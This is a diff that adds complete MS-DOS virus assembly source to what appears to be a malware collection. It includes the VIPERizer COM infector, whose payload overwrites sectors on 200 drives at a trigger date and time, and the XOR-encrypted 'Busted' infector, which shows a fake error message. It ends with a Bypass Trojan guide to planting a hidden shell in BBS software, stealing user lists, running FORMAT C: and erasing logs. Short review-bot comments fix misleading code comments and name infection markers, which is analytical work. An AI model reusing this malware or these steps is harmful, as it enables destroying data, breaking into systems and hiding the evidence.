+ + mov ah,2ch ; read system clock + int 21h + mov bx,cs:pointer + mov al,cs:[bx] + mov bx,dx + mov cx,2 + mov dh,0 + int 26h ; write crap on disk + +; Check if the end of the search order table has been +; reached. If so, end. + +no_name_change: + mov bx,cs:pointer + dec bx + mov cs:pointer,bx + mov dl,cs:[bx] + cmp dl,0ffh + jnz hups2 + jmp hops + +; Get new drive from the search order table and +; select it. + +hups2: + mov ah,0eh + int 21h ; change disk + +; Start in the root directory + + mov ah,3bh ; change path + lea dx,path + int 21h + jmp find_first_file + +; Starting from the root, search for the first subdir +; First convert all .EXE files to .COM in the old +; directory. + +find_first_subdir: + mov ah,17h ; change exe to com + lea dx,cs:maske_exe + int 21h + mov ah,3bh ; use root dir + lea dx,path + int 21h + mov ah,04eh ; Search for first subdirectory + mov cx,00010001b ; dir mask + lea dx,maske_dir + int 21h + jc change_disk + mov bx,CS:counter + INC BX + DEC bx + jz use_next_subdir + +; Search for the next subdir. If no more directories +; are found, the drive will be changed. + +find_next_subdir: + mov ah,4fh ; search for next subdir + int 21h + jc change_disk + dec bx + jnz find_next_subdir + +; Select found directory. + +use_next_subdir: + mov ah,2fh ; get dta address + int 21h + add bx,1ch + mov es:[bx],'\ ' ; address of name in dta + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3bh ; change path + int 21h + pop ds + mov bx,cs:counter + inc bx + mov CS:counter,bx + +; Find first .COM file in the current directory. +; If there are none, search the next directory. + +find_first_file: + mov ah,04eh ; Search for first + mov cx,00000001b ; mask + lea dx,maske_com + int 21h + jc find_first_subdir + jmp check_if_ill + +; If the program is already infected, search for +; the next program. + +find_next_file: + mov ah,4fh ; search for next + int 21h + jc find_first_subdir + +; Check if already infected by the virus. 
+ +check_if_ill: + mov ah,3dh ; open channel + mov al,02h ; read/write + mov dx,9eh ; address of name in dta + int 21h + mov bx,ax ; save channel + mov ah,3fh ; read file + mov cx,buflen + mov dx,buffer ; write in buffer + int 21h + mov ah,3eh ; close file + int 21h + +; Here we search for the three NOP's. +; If present, there is already infection. We must +; then continue the search. + + mov bx,cs:offset[buffer] ; added A86 compatibility + cmp bx,9090h + jz find_next_file + +; Bypass MS-DOS write protection if present + + mov ah,43h ; write enable + mov al,0 + mov dx,9eh ; address of name in dta + int 21h + mov ah,43h + mov al,01h + and cx,11111110b + int 21h + +; Open file for read/write access. + + mov ah,3dh ; open channel + mov al,02h ; read/write + mov dx,9eh ; address of name in dta + int 21h + +; Read date entry of program and save for future use. + + mov bx,ax ; channel + mov ah,57h ; get date + mov al,0 + int 21h + push cx ; save date + push dx + +; The jump located at address 0100h of the program +; will be saved for future use. + + mov dx,cs:[conta] ; save old jmp + mov cs:offset[jmpbuf],dx ; added A86 compatibility + mov dx,cs:[buffer+1] ; save new jump + lea cx,cont-100h + sub dx,cx + mov cs:[conta],dx + +; The virus copies itself to the start of the file. + + mov ah,40h ; write virus + mov cx,buflen ; length buffer + lea dx,main ; write virus + int 21h + +; Enter the old creation date of the file. + + mov ah,57h ; write date + mov al,1 + pop dx + pop cx ; restore date + int 21h + +; Close the file + + mov ah,3eh ; close file + int 21h + +; Restore the old jump address. +; The virus saves at address "conta" the jump which +; was at the start of the host program. +; This is done to preserve the executability of the +; host program as much as possible. +; After saving it still works with the jump address +; contained in the virus. The jump address in the +; virus differs from the jump address in memory. 
+ + mov dx,cs:offset[jmpbuf] ; restore old jmp - A86 compat. + mov cs:[conta],dx + +hops: + nop + call use_old + +; Continue with the host program. + +cont db 0e9h ; make jump +conta dw 0 + mov ah,00 + int 21h + +; Reactivate the selected drive at the start of the +; program. + +use_old: + mov ah,0eh ; use old drive + mov dl,cs:drive + int 21h + +; Reactivate the selected path at the start of the +; program. + + mov ah,3bh ; use old dir + lea dx,old_path-1 ; get old path and backslash + int 21h + ret + +search_order db 0ffh,1,0,2,3,0ffh,00,0ffh +pointer dw 0000 ; pointer f. search order +counter dw 0000 ; counter f. nth. search +disks db 0 ; number of disks + +maske_com db "*.com",00 ; search for com files +maske_dir db "*",00 ; search for dir's +maske_exe db 0ffh,0,0,0,0,0,00111111b + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +maske_all db 0ffh,0,0,0,0,0,00111111b + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +buffer equ 0e000h ; a safe place + +buflen equ 230h ; length of virus !!!!!!! + ; careful + ; if changing !!!!!!! + +jmpbuf equ buffer+buflen ; a safe place for jmp +path db "\",0 ; first path +drive db 0 ; actual drive +back_slash db "\" +old_path db 32 dup(?) ; old path + +code ends + +end main diff --git a/MSDOS/Virus.MSDOS.Unknown.bush.asm b/MSDOS/Virus.MSDOS.Unknown.bush.asm new file mode 100644 index 00000000..087b3e95 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.bush.asm 
@@ -0,0 +1,413 @@ +; +; VIPERizer, Strain B +; Copyright (c) 1992, Stingray/VIPER +; This is a Viral Inclined Programming Experts Ring Programming Team Production +; +; VIPER are: Stingray, Venom, and Guido Sanchez +; + +MOV_CX MACRO X ; Here is just a simple "mov cx,xxxx" macro. + DB 0B9H + DW X +ENDM + +CODE SEGMENT + ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE + ORG $+0100H + +VCODE: JMP virus + + NOP ; just a dud for the 'infected' file. + +v_start equ $ + + +virus: PUSH CX + mov ax,0ff0fh ; Thanks to RABID... Change Mem Marker + int 21h + cmp ax,101h ; Is VirexPC/FluShit in memory? + jne more_virus ; Nope. + jmp quit ; FUCK!!!!! +more_virus: + MOV DX,OFFSET vir_dat ;This is where the virus data starts. + ; The 2nd and 3rd bytes get modified. + CLD ;Pointers will be auto INcremented + MOV SI,DX ;Access data as offset from SI + ADD SI,first_3 ;Point to original 1st 3 bytes of .COM + MOV DI,OFFSET 100H ;`cause all .COM files start at 100H + mov cx,3 + REPZ MOVSB ;Restore original first 3 bytes of .COM + MOV SI,DX ;Keep SI pointing to the data area + + MOV AH,30H + INT 21H + nop + CMP AL,0 ;0 means it's version 1.X + JNZ dos_ok ;For version 2.0 or greater + JMP quit ;Don't try to infect version 1.X +dos_ok: + mov ah,2ch ; Get Time + int 21h ; Do it. + xor bx,bx ; VIPERize bx, for later use. + cmp dl,4 ; hund's of seconds 4? + jle print_message ; If 4 or less, print a message. + ; This serves as a random 1 in 20 + ; chance of the message printing + jmp short get_date ; No? What date is it...? +print_message: + mov dl, byte ptr [si+msg+bx] ; Get a byte of our message... + or dl,dl ; is it 0? (end of message) + jz get_date ; Get the date if it is... + sub dl,75 ; Unencrypt message + mov ah,2 ; Prepare to print one letter + int 21h ; do it! + inc bx ; point to next character. + jmp short print_message ; Do it again. +get_date: + mov ah,2ah ; What day is it? + int 21h ; Find out. + cmp dh,3 ; Is it february? + jne resume ; No? Oh well. + cmp dl,24 ; Is it valentines day? 
+ jne resume ; No? Damn. + mov ah,2ch ; What time is it? + int 21h ; Find out. + cmp ch,7 ; Is it 7 hours? + jne resume ; No? C'est la vie... + cmp cl,45 ; Is it 45 minutes? + jne resume ; No? Too Bad... + xor bx,bx ; VIPERize bx +cool: + mov dl,byte ptr [si+msg2+bx] ; This is pretty much the + or dl,dl ; same as the above 'print' + jz no_mas ; function. except I didn't + sub dl,75 ; make it a procedure. + mov ah,2 + int 21h + inc bx + jmp short cool +no_mas: + mov al,0 ; Start with drive default +phri: + mov cx,255 ; Nuke a few sectors + mov dx,1 ; Beginning with sector 1!!! + int 26h ; VIPERize them!!!! Rah!!! + jc error ; Uh oh. Problem. + add sp,2 ; Worked great. Clear the stack... +error: + inc al ; Get another drive! + cmp al,200 ; Have we fried 200 drives? + je done_phrying ; Yep. + jmp short phri ; Nope. +done_phrying: + cli ; Disable Interrupts + hlt ; Lock up computer. +resume: + PUSH ES + MOV AH,2FH + INT 21H + nop + MOV [SI+old_dta],BX + MOV [SI+old_dts],ES ;Save the DTA address + POP ES + MOV DX,dta ;Offset of new DTA in virus data area + nop + ADD DX,SI ;Compute DTA address + MOV AH,1AH + INT 21H ;Set new DTA to inside our own code + nop + PUSH ES + PUSH SI + MOV ES,DS:2CH + MOV DI,0 ;ES:DI points to environment +find_path: + POP SI + PUSH SI ;Get SI back + ADD SI,env_str ;Point to "PATH=" string in data area + LODSB + nop + MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long + REPNZ SCASB ;Search for first character + MOV CX,4 +check_next_4: + LODSB + SCASB + JNZ find_path ;If not all there, abort & start over + nop + LOOP check_next_4 ;Loop to check the next character + POP SI + POP ES + nop + MOV [SI+path_ad],DI ;Save the address of the PATH + MOV DI,SI + ADD DI,wrk_spc ;File name workspace + nop + MOV BX,SI ;Save a copy of SI + ADD SI,wrk_spc ;Point SI to workspace + MOV DI,SI ;Point DI to workspace + JMP SHORT slash_ok +set_subdir: + CMP WORD PTR [SI+path_ad],0 ;Is PATH string ended? 
+ JNZ found_subdir ;If not, there are more subdirectories + JMP all_done ;Else, we're all done +found_subdir: + PUSH DS + PUSH SI + MOV DS,ES:2CH ;DS points to environment segment + nop + MOV DI,SI + MOV SI,ES:[DI+path_ad] ;SI = PATH address + ADD DI,wrk_spc ;DI points to file name workspace +move_subdir: + LODSB ;Get character + CMP AL,';' ;Is it a ';' delimiter? + JZ moved_one ;Yes, found another subdirectory + nop + CMP AL,0 ;End of PATH string? + JZ moved_last_one ;Yes + STOSB ;Save PATH marker into [DI] + JMP SHORT move_subdir +moved_last_one: + xor si,si +moved_one: + POP BX ;Pointer to virus data area + POP DS ;Restore DS + MOV [BX+path_ad],SI ;Address of next subdirectory + NOP + CMP CH,'\' ;Ends with "\"? + nop + JZ slash_ok ;If yes + MOV AL,'\' ;Add one, if not + STOSB +slash_ok: + MOV [BX+nam_ptr],DI ;Set filename pointer to name workspace + MOV SI,BX ;Restore SI + ADD SI,f_spec ;Point to "*.COM" + MOV CX,6 + nop + REPZ MOVSB ;Move "*.COM",0 to workspace + MOV SI,BX + MOV AH,4EH + MOV DX,wrk_spc + ADD DX,SI ;DX points to "*.COM" in workspace + MOV CX,3 ;Attributes of Read Only or Hidden OK + INT 21H + nop + JMP SHORT find_first +find_next: + MOV AH,4FH + INT 21H + nop +find_first: + JNB found_file ;Jump if we found it + JMP SHORT set_subdir ;Otherwise, get another subdirectory +found_file: + MOV AX,[SI+dta_tim] ;Get time from DTA + AND AL,1FH ;Mask to remove all but seconds + CMP AL,1FH ;62 seconds -> already infected + JZ find_next ;If so, go find another file + CMP WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long? + nop + JA find_next ;If too long, find another one + CMP WORD PTR [SI+dta_len],0AH ;Is it too short? 
+ JB find_next ;Then go find another one + MOV DI,[SI+nam_ptr] ;DI points to file name + PUSH SI ;Save SI + ADD SI,dta_nam ;Point SI to file name +more_chars: + LODSB + STOSB + CMP AL,0 + JNZ more_chars ;Move characters until we find a 00 + POP SI + MOV AX,OFFSET 4300H + nop + MOV DX,wrk_spc ;Point to \path\name in workspace + ADD DX,SI + INT 21H + nop + MOV [SI+old_att],CX ;Save the old attributes + MOV AX,OFFSET 4301H ;Set attributes + AND CX,OFFSET 0FFFEH ;Set all except "read only" (weird) + nop + MOV DX,wrk_spc ;Offset of \path\name in workspace + ADD DX,SI ;Point to \path\name + INT 21H + nop + MOV AX,OFFSET 3D02H ;Read/Write + nop + MOV DX,wrk_spc ;Offset to \path\name in workspace + ADD DX,SI ;Point to \path\name + INT 21H + nop + JNB opened_ok ;If file was opened OK + JMP fix_attr ;If it failed, restore the attributes + +opened_ok: + MOV BX,AX + MOV AX,OFFSET 5700H + INT 21H + nop + MOV [SI+old_tim],CX ;Save file time + MOV [SI+ol_date],DX ;Save the date + MOV AH,3FH + nop + MOV CX,3 + MOV DX,first_3 + ADD DX,SI + INT 21H ;Save first 3 bytes into the data area + nop + JB fix_time_stamp ;Quit, if read failed + CMP AX,3 ;Were we able to read all 3 bytes? + JNZ fix_time_stamp ;Quit, if not + MOV AX,OFFSET 4202H + xor cx,cx + xor dx,dx + INT 21H + nop + JB fix_time_stamp ;Quit, if it didn't work + MOV CX,AX ;DX:AX (long int) = file size + SUB AX,3 ;Subtract 3 (OK, since DX must be 0, here) + MOV [SI+jmp_dsp],AX ;Save the displacement in a JMP instruction + nop + ADD CX,OFFSET c_len_y + MOV DI,SI ;Point DI to virus data area + SUB DI,OFFSET c_len_x + ;Point DI to reference vir_dat, at start of pgm + MOV [DI],CX ;Modify vir_dat reference:2nd, 3rd bytes of pgm + MOV AH,40H + MOV_CX virlen ;Length of virus, in bytes + nop + MOV DX,SI + SUB DX,OFFSET codelen ;Length of virus code, gives starting + ; address of virus code in memory + INT 21H + nop + JB fix_time_stamp ;Jump if error + CMP AX,OFFSET virlen ;All bytes written? 
+ JNZ fix_time_stamp ;Jump if error + MOV AX,OFFSET 4200H + xor cx,cx + xor dx,dx + INT 21H + nop + JB fix_time_stamp ;Jump if error + MOV AH,40H + MOV CX,3 + nop + MOV DX,SI ;Virus data area + ADD DX,jmp_op ;Point to the reconstructed JMP + INT 21H + nop +fix_time_stamp: + MOV DX,[SI+ol_date] ;Old file date + nop + MOV CX,[SI+old_tim] ;Old file time + AND CX,OFFSET 0FFE0H + nop + OR CX,1FH ;Seconds = 31/30 min = 62 seconds + MOV AX,OFFSET 5701H + INT 21H + nop + MOV AH,3EH + INT 21H + nop +fix_attr: + MOV AX,OFFSET 4301H + MOV CX,[SI+old_att] ;Old Attributes + nop + MOV DX,wrk_spc + ADD DX,SI ;DX points to \path\name in workspace + INT 21H + nop +all_done: + PUSH DS + MOV AH,1AH + MOV DX,[SI+old_dta] + nop + MOV DS,[SI+old_dts] + INT 21H + nop + POP DS + nop +quit: + POP CX + XOR AX,AX + XOR BX,BX + xor cx,cx + XOR DX,DX + XOR SI,SI + MOV DI,OFFSET 0100H + PUSH DI + XOR DI,DI + RET 0FFFFH +vir_dat EQU $ +olddta_ DW 0 ;Old DTA offset +olddts_ DW 0 ;Old DTA segment +oldtim_ DW 0 ;Old Time +oldate_ DW 0 ;Old date +oldatt_ DW 0 ;Old file attributes +first3_ EQU $ + INT 20H + NOP +jmpop_ DB 0E9H ;Start of JMP instruction +jmpdsp_ DW 0 ;The displacement part +fspec_ DB '*.COM',0 +pathad_ DW 0 ;Path address +namptr_ DW 0 ;Pointer to start of file name +envstr_ DB 'PATH=' ;Find this in the environment +wrkspc_ DB 40h dup (0) +dta_ DB 16h dup (0) ;Temporary DTA goes here +dtatim_ DW 0,0 ;Time stamp in DTA +dtalen_ DW 0,0 ;File length in the DTA +dtanam_ DB 0Dh dup (0) ;File name in the DTA +reboot_ DB 0EAH,0F0H,0FFH,0FFH,0FFH ;Five byte FAR JMP to FFFF:FFF0 + +_msg db 158,186,189,189,196,107,191,179,180,190,107,174,186,184,187,192 + db 191,176,189,107,180,190,107,185,186,107,183,186,185,178,176,189 + db 107,186,187,176,189,172,191,180,186,185,172,183,107,175,192,176 + db 107,191,186,107,172,185,107,186,192,191,173,189,176,172,182,107 + db 186,177,088,141,192,190,179,180,190,179,180,189,186,088,147,172 + db 193,176,107,172,107,153,148,142,144,107,175,172,196,121,121,121 + 
db 088 + db 0 + +_msg2 db 161,148,155,144,157,180,197,176,189,119,107,158,191,189,172,180 + db 185,107,141,085,088 + db 115,174,116,107,124,132,132,125,119,107,158,191,180,185,178,189 + db 172,196,122,161,148,155,144,157,085,088 + db 147,172,187,187,196,107,161,172,183,176,185,191,180,185,176,190 + db 107,143,172,196,108,085,088 + db 0 + + +lst_byt EQU $ ;All lines that assemble into code are + ; above this one + +virlen = lst_byt - v_start ;Length, in bytes, of the entire virus +codelen = vir_dat - v_start ;Length of virus code, only +c_len_x = vir_dat - v_start - 2 ;Displacement for self-modifying code +c_len_y = vir_dat - v_start + 100H ;Code length + 100h, for PSP +old_dta = olddta_ - vir_dat ;Displacement to the old DTA offset +old_dts = olddts_ - vir_dat ;Displacement to the old DTA segment +old_tim = oldtim_ - vir_dat ;Displacement to old file time stamp +ol_date = oldate_ - vir_dat ;Displacement to old file date stamp +old_att = oldatt_ - vir_dat ;Displacement to old attributes +first_3 = first3_ - vir_dat ;Displacement-1st 3 bytes of old .COM +jmp_op = jmpop_ - vir_dat ;Displacement to the JMP opcode +jmp_dsp = jmpdsp_ - vir_dat ;Displacement to the 2nd 2 bytes of JMP +f_spec = fspec_ - vir_dat ;Displacement to the "*.COM" string +path_ad = pathad_ - vir_dat ;Displacement to the path address +nam_ptr = namptr_ - vir_dat ;Displacement to the filename pointer +env_str = envstr_ - vir_dat ;Displacement to the "PATH=" string +wrk_spc = wrkspc_ - vir_dat ;Displacement to the filename workspace +dta = dta_ - vir_dat ;Displacement to the temporary DTA +dta_tim = dtatim_ - vir_dat ;Displacement to the time in the DTA +dta_len = dtalen_ - vir_dat ;Displacement to the length in the DTA +dta_nam = dtanam_ - vir_dat ;Displacement to the name in the DTA +reboot = reboot_ - vir_dat ;Displacement to the 5 byte reboot code +msg = _msg - vir_dat ; Disp. to 1st msg +msg2 = _msg2 - vir_dat ; Disp. to 2nd msg + CODE ENDS +END VCODE + \ No newline at end of file 
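Review bot: The trigger comments in the `get_date` block contradict the code: `cmp dh,3 ; Is it february?` tests for month 3, i.e. March, and `cmp dl,24 ; Is it valentines day?` tests for the 24th, so the destructive `int 26h` path in `phri` is reached on March 24 at 07:45, not on February 14. Those two comments should read `; month == 3 (March)?` and `; day == 24?` so an analyst reading the listing gets the real activation date. The file header also never states the on-disk infection marker, which is the only indicator this listing offers: `fix_time_stamp` forces the seconds field of the host's time stamp to 31 (`OR CX,1FH`, shown as 62 seconds) and `found_file` skips any file whose time stamp already carries that value. A header line such as `; Infection marker: host time stamp seconds field == 31 (62 s)` would make that visible without reading the whole routine.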
diff --git a/MSDOS/Virus.MSDOS.Unknown.busted.asm b/MSDOS/Virus.MSDOS.Unknown.busted.asm
new file mode 100644
index 00000000..88aa4403
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.busted.asm
@@ -0,0 +1,225 @@ +cr equ 13 ; Carriage return ASCII code +lf equ 10 ; Linefeed ASCII code +tab equ 9 ; Tab ASCII code +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +;--------------------------------------------------------------------- +; All executable code is contained in boundaries of procedure "main". +; The following code, until the start of "virus_code", is the non- +; encrypted CMT portion of the code to load up the real program. +;--------------------------------------------------------------------- +main proc near ; Code execution begins here + call encrypt_decrypt ; Decrypt the real virus code + jmp random_mutation ; Put the virus into action + +encrypt_val1 db 00h ; Hold value to encrypt by here +encrypt_val2 db 00h + +; ---------- Encrypt, save, and restore the virus code ----------- +infect_file: + mov cx,handle ; Get the handle + push cx ; Save it on the stack + call encrypt_decrypt ; Encrypt most of the code + pop bx ; Get back the handle + mov cx,endvir-main ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + call encrypt_decrypt ; Restore the code as it was + ret ; Go back to where you came from + +; --------------- Encrypt or decrypt the code ---------------- +encrypt_decrypt: + mov bx,offset virus_code ; Get address to start encrypt/decrypt +xor_loop: ; Start cycle here + mov al,[bx] ; Get the current byte + xor al,encrypt_val1 ; Engage/disengage XOR scheme on it + mov [bx],al ; Put it back where 
we got it + inc bx ; Move BX ahead a byte + cmp bx,offset virus_code+(endvir-main) ; Are we at the end? + je xor_nd + mov al,[bx] + xor al,encrypt_val2 + mov [bx],al + inc bx + cmp bx,offset virus_code+(endvir-main) + jle xor_loop ; If not, do another cycle +xor_nd: + ret ; and go back where we came from + +;----------------------------------------------------------------------- +; The rest of the code from here on remains encrypted until run-time, +; using a fundamental XOR technique that changes via CMT. +;----------------------------------------------------------------------- +virus_code: + +;---------------------------------------------------------------------------- +; All strings are kept here in the file, and automatically encrypted. +; Please don't be a lamer and change the strings and say you wrote a virus. +; Because of Cybernetic Mutation Technology(tm), the CRC of this file often +; changes, even when the strings stay the same. +;---------------------------------------------------------------------------- +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Program too big to fit in memory$" +virus_msg db cr,lf,tab,"Busted!$" +virus_info db "This is based on Leprosy-B. Thanx PCM2" +viral_tag db "Busted, Strain A, version 1.0" +viral_tag_2 db "By 榾譆&罘辰$ (Psychogenius), September '91" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val1,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. 
+ mov encrypt_val1,dl ; Otherwise, save the new value + mov encrypt_val2,dh +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + 
mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val1 ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? + je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,6 ; Are at least 6 files infected? 
+ jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? + jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + MOV DX, OFFSET virus_msg ; Print "Busted!" + jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program +endvir LABEL BYTE + +main endp +code ends + end main + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 + diff --git a/MSDOS/Virus.MSDOS.Unknown.bypass.asm b/MSDOS/Virus.MSDOS.Unknown.bypass.asm new file mode 100644 index 00000000..9468b8de --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.bypass.asm 
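Review bot: In `close_file` the register comments are swapped: `mov cx,orig_time ; Get the date stamp` and `mov dx,orig_date ; Get the time stamp` — for int 21h function 57h with AL=1, CX carries the time and DX the date, which is exactly how `find_healthy` fills `orig_time` and `orig_date` from the DTA, so the two comments should read `; Get the time stamp` and `; Get the date stamp` respectively. `mov files_infected,4 ; BX counts file infected so far` is also misleading, since the counter is the memory word `files_infected` and BX is not involved. The listing's header says nothing about how an already-infected file is recognised, which is the point an analyst needs first: `find_healthy` reads the first 20 bytes of each candidate into `compare_buf`, overwrites byte 6 (the `encrypt_val1` slot at 106h) with the running key via `mov [bx+6],ah`, and `repe cmpsb`s the buffer against the virus image at `code_start`. A header comment stating `; Recognition: first 20 bytes of the file compared against the virus image at 100h, byte 6 (key) masked` would document that.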
@@ -0,0 +1,220 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +哪哪哪哪哪哪哪哪哪哪哪> Bypass Trojan v1.0 and v2.0 : + + Created by: Mechanix + Released : October 1991 + + Introduction: + + Well this is basically another backdoor creator for Telegard Systems. This + one is relatively fullproof except for the fact that it requires REMOTE.BAT to + exist on the target system, or it will not function properly. However, the + Bypass Trojan v2.0 takes care of this problem as it creates REMOTE.BAT on the + target system, if it doesn't exist already. This is why I am also releasing + the source (in Turbo Pascal) to the Bypass Trojan v1.0. You will find the + source after the description. + + Description: + + This trojan will scan all directories on drives C: to E: in search of the + MAIN.MNU file. Then it will append a few lines to the file as to create a + hidden command to shell to DOS. It also checks to see if the MAIN.MNU file is + Read-Only or Hidden, and will remove these attributes long enough to make the + changes. It will also check for write-protection. 
The source can also be + changed as to modify any of the .MNU files. + + Notes: + + This trojan uses a basic Turbo Pascal cycle to scan all directories and + files, and thus the source can be modified for a number of uses. As for a good + procedure to nail the board once the shell to DOS command has been + implemented, I recommend the following: + - First and foremost, use a PBX or other phreaking trick to avoid the + annoying Maestro phone. + - Call preferably around 4-5 am, when the SysOp is almost sure not to be + around. + - Use the shuttle password (if there is one) and then apply as a NEW user + after you have bypassed the shuttle password. This will usually bypass CBV + utilities. + - Shell to DOS in the correct menu. + - Turn your capture mode on, as to record everything you see. + - Go get the user list and ZIP it up with another ZIP file that is already + online. This way you can D/L it later when you log on again. Or capture it + through a text file viewing utility if you find one on the system. + - If you don't want the user list, and just want to crash the board, then + FORMAT C: should do the trick. Or uses DEBUG to rearrange his FATs. Or if + it's a H/P board, use one of the online virii or trojans to screw him. That + will teach him, and you get to test them out. + - If you decide to only take the user list and let the board live, then go + edit the logs as to remove all evidence of your actions. If there's a spool + to printer log, you're in trouble. + - If you could not bypass CBV, then find that utility's log and edit out + your number. + - Lastly, take off the DOS shell command from the menu you modified in the + first place, unless you want to use it again, but this is risky. + + Well that's the method I've been using, but the choice is your's. 
